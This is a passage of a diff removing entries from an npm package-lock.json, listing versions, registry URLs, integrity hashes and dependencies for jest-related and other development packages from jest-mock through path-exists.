"graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=", - "dev": true - }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true, - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dev": true, - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "dev": true, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dev": true, - "dependencies": { - "mime-db": "1.49.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "3.1.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", - "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true, - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "dev": true, - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "dev": true, - "optional": true, - "dependencies": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": 